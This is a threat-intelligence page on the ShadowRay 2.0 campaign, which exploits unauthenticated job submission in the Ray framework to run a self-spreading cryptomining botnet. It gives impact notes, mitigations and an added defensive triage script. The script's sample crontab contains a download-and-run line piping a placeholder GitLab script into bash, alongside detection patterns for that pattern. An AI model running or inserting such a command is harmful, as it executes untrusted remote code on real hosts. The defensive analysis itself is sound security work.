ShadowRay 2.0 Exploits Unpatched Ray Flaw to Build Self-Spreading GPU Cryptomining Botnet
Oligo Security has warned of ongoing attacks exploiting a two-year-old security flaw in the Ray open-source artificial intelligence (AI) framework to turn infected clusters with NVIDIA GPUs into a self-replicating cryptocurrency mining botnet. The activity, codenamed ShadowRay 2.0, is an evolution of a prior wave that was observed between September 2023 and March 2024. The attack, at its core,
AI Analysis
Technical Summary
ShadowRay 2.0 is a sophisticated exploitation campaign targeting a critical unauthenticated remote code execution vulnerability (CVE-2023-48022, CVSS 9.8) in the Ray open-source AI framework, which is widely used for distributed computing and AI workloads, often leveraging NVIDIA GPUs. The flaw stems from a missing authentication mechanism in the Ray Job Submission API (/api/jobs/), allowing attackers to submit arbitrary jobs remotely without credentials. This vulnerability has remained unpatched due to a design philosophy that Ray should only be deployed in isolated, trusted network environments. However, many deployments expose Ray dashboards publicly, creating a large attack surface with over 230,500 publicly accessible Ray servers identified. The ShadowRay 2.0 campaign, active since at least September 2024 and evolving from earlier waves, exploits this flaw to hijack GPU clusters for illicit cryptocurrency mining using the XMRig miner. The attackers submit malicious jobs that execute reconnaissance, multi-stage Bash and Python payloads, and establish persistence through cron jobs that regularly update the malware from attacker-controlled GitLab repositories. The malware also spreads laterally by scanning for other exposed Ray dashboards and submitting malicious jobs to them, effectively creating a worm that self-propagates across vulnerable clusters globally. The campaign uses GitHub and GitLab repositories to host payloads, with attackers quickly recreating accounts after takedowns, demonstrating operational resilience. The malware includes region-specific payloads, notably serving a different variant for victims in China, and actively terminates competing cryptominers to maximize resource usage. To evade detection, malicious processes masquerade as legitimate Linux kernel workers and throttle CPU usage to about 60%. 
Beyond cryptojacking, compromised clusters are weaponized for denial-of-service attacks using tools like sockstress, targeting mining pool infrastructure and possibly rented out for DDoS services. The campaign leverages Ray's legitimate orchestration features for lateral movement and persistence, turning a trusted AI framework into a multi-purpose botnet. Mitigation is complicated by the lack of a patch and the design assumptions of Ray, but network isolation, firewall restrictions, and adding authentication to the Ray dashboard port (8265) are critical. Anyscale, the original Ray developer, has released tools to detect exposed ports and misconfigurations to help prevent accidental exposure. The campaign's use of large language models to craft payloads and its persistence highlight the increasing sophistication of modern cryptojacking operations.
Potential Impact
For European organizations, the ShadowRay 2.0 threat poses significant risks, especially for those deploying Ray clusters with NVIDIA GPUs in cloud or on-premises environments without strict network isolation. The unauthorized control of GPU resources leads to substantial financial losses due to wasted electricity and hardware wear from illicit cryptomining. The lateral spread capability increases the likelihood of widespread compromise within organizations or service providers hosting multiple Ray clusters. The use of compromised clusters for DDoS attacks adds reputational damage and potential collateral damage to critical infrastructure or business partners. Organizations relying on Ray for AI workloads may face operational disruptions, data confidentiality risks from reverse shells, and increased incident response costs. The stealthy nature of the malware, including process masquerading and CPU throttling, complicates detection and remediation efforts. The persistence mechanisms and rapid attacker adaptation to takedowns suggest prolonged exposure and risk if mitigations are not promptly applied. Additionally, the campaign’s regional payload differentiation and active removal of competing miners indicate a targeted and financially motivated adversary, increasing the threat’s sophistication. European cloud providers, research institutions, and enterprises using AI frameworks are particularly vulnerable if they expose Ray dashboards to the internet or fail to implement strict access controls.
Mitigation Recommendations
1. Immediately audit all Ray cluster deployments to identify any instances with publicly accessible dashboards, especially on the default port 8265.
2. Implement strict network segmentation and firewall rules to restrict access to Ray dashboards and APIs only to trusted internal networks or VPNs.
3. Deploy authentication and authorization layers on top of the Ray dashboard and job submission APIs, as the framework lacks built-in authentication by design.
4. Utilize the 'Ray Open Ports Checker' tool provided by Anyscale to detect misconfigurations and exposed ports.
5. Monitor for unusual process activity on GPU clusters, including disguised Linux kernel worker processes and abnormal CPU usage patterns around 60%.
6. Scan for and remove unauthorized cron jobs or scheduled tasks that pull external payloads regularly.
7. Employ endpoint detection and response (EDR) solutions capable of detecting lateral movement, reverse shells, and cryptomining activity.
8. Block known malicious IP addresses and domains associated with GitHub and GitLab repositories used for payload delivery.
9. Educate DevOps and AI teams on the risks of exposing Ray dashboards publicly and enforce deployment best practices requiring isolated network environments.
10. Establish incident response plans specifically addressing cryptojacking and botnet infections leveraging AI frameworks.
11. Regularly update and patch all related infrastructure components, and monitor threat intelligence feeds for new developments or patches related to Ray.
12. Consider deploying honeypots mimicking Ray dashboards to detect scanning and exploitation attempts early.
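The following host-side triage script is an added example covering mitigation items 1, 5 and 6 above; it is not code from the article, from Oligo Security, Anyscale or the Ray project. It parses constructed sample text standing in for the output of `ss -ltnp`, `ps -eo pid,ppid,pcpu,comm,args` and `crontab -l` so it runs offline; on a real host the same functions take the live command output. The function names, the sample values and the placeholder URL are all assumptions made for the example.

```python
"""Host-side triage for the ShadowRay 2.0 mitigation items 1, 5 and 6.

Added example, not code from the page, Oligo Security, Anyscale or the Ray
project. It parses constructed sample text standing in for the output of
`ss -ltnp`, `ps -eo pid,ppid,pcpu,comm,args` and `crontab -l` so it runs
offline; in practice, pipe the real command output into the same functions.
"""
import re

RAY_DASHBOARD_PORT = 8265          # default Ray dashboard / Job Submission API port
LOOPBACK = {"127.0.0.1", "[::1]", "localhost"}
KERNEL_PPIDS = {0, 2}              # real kernel threads hang off kthreadd (PID 2)

# download-and-execute pattern and code-hosting references in scheduled tasks
FETCH_PIPE_SHELL = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")
CODE_HOST = re.compile(r"gitlab|github", re.IGNORECASE)


def exposed_dashboard_listeners(ss_output, port=RAY_DASHBOARD_PORT):
    """Local addresses where `port` is bound to something other than loopback.

    Wildcard binds (0.0.0.0, [::]) and routable addresses are returned; a
    dashboard bound only to loopback is not reachable from the network.
    """
    found = []
    for line in ss_output.splitlines():
        parts = line.split()
        if len(parts) < 4 or parts[0] != "LISTEN":
            continue
        local = parts[3]                         # e.g. 0.0.0.0:8265 or [::]:22
        host, sep, p = local.rpartition(":")
        if sep and p.isdigit() and int(p) == port and host not in LOOPBACK:
            found.append(local)
    return found


def masquerading_kernel_workers(ps_output):
    """Processes named like kernel workers that are not children of kthreadd.

    Genuine kworker threads have PPID 2; a user-space process that renamed
    itself to look like one still has an ordinary parent. The %CPU column is
    kept so a sustained reading near 60% can be correlated with the throttling
    described in the analysis. (On a live host, also check whether
    /proc/<pid>/exe resolves: kernel threads have no executable.)
    """
    hits = []
    for line in ps_output.splitlines():
        parts = line.split(None, 4)
        if len(parts) < 5 or not parts[0].isdigit():
            continue
        pid, ppid, pcpu, comm, args = parts
        looks_kernel = comm.startswith("kworker") or args.startswith("[kworker")
        if looks_kernel and int(ppid) not in KERNEL_PPIDS:
            hits.append({"pid": int(pid), "ppid": int(ppid), "pcpu": float(pcpu), "comm": comm})
    return hits


def suspicious_cron_entries(crontab_output):
    """Cron lines that fetch a remote script and run it, or pull from GitLab/GitHub."""
    hits = []
    for line in crontab_output.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        fetches = re.search(r"\b(curl|wget)\b", line) is not None
        if FETCH_PIPE_SHELL.search(line) or (fetches and CODE_HOST.search(line)):
            hits.append(line.strip())
    return hits


def triage(ss_output, ps_output, crontab_output):
    """Run all three checks and return the findings in one dict."""
    return {
        "exposed_dashboard": exposed_dashboard_listeners(ss_output),
        "masquerading_processes": masquerading_kernel_workers(ps_output),
        "suspicious_cron": suspicious_cron_entries(crontab_output),
    }


# --- constructed sample input (not captured from a real host) ---------------
SS_SAMPLE = """\
State  Recv-Q Send-Q Local Address:Port  Peer Address:Port Process
LISTEN 0      128    0.0.0.0:8265        0.0.0.0:*         users:(("python3",pid=4120,fd=7))
LISTEN 0      128    127.0.0.1:6379      0.0.0.0:*         users:(("gcs_server",pid=4101,fd=5))
LISTEN 0      128    [::]:22             [::]:*            users:(("sshd",pid=812,fd=3))
"""

PS_SAMPLE = """\
  PID  PPID %CPU COMMAND      COMMAND
    2     0  0.0 kthreadd     [kthreadd]
   15     2  0.0 kworker/0:1  [kworker/0:1]
 4120  4102  2.1 python3      python3 -m ray.dashboard.dashboard
 5377  5370 59.8 kworker/u8:3 [kworker/u8:3]
"""

CRON_SAMPLE = """\
# m h dom mon dow command
0 3 * * * /usr/bin/apt-get update >/dev/null 2>&1
*/15 * * * * curl -fsSL https://gitlab.example/placeholder/update.sh | bash
"""

if __name__ == "__main__":
    for check, findings in triage(SS_SAMPLE, PS_SAMPLE, CRON_SAMPLE).items():
        print(f"{check}: {findings if findings else 'nothing flagged'}")
```

On the sample input the script flags the dashboard bound to 0.0.0.0:8265, the process named `kworker/u8:3` whose parent is an ordinary PID rather than kthreadd, and the cron entry that pipes a downloaded script into bash. Each check is deliberately conservative (loopback binds, real kernel threads and plain package-manager cron jobs are not reported), so a non-empty result is worth a manual look rather than an automatic action.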
Affected Countries
Germany, France, United Kingdom, Netherlands, Sweden, Finland, Italy, Spain, Poland, Belgium
Technical Details
Article Source: https://thehackernews.com/2025/11/shadowray-20-exploits-unpatched-ray.html (fetched 2025-11-21T01:09:42.001Z, 1248 words)
Threat ID: 691fbbd770da09562fa00949
Added to database: 11/21/2025, 1:09:43 AM
Last enriched: 11/21/2025, 1:10:00 AM
Last updated: 11/21/2025, 12:00:46 PM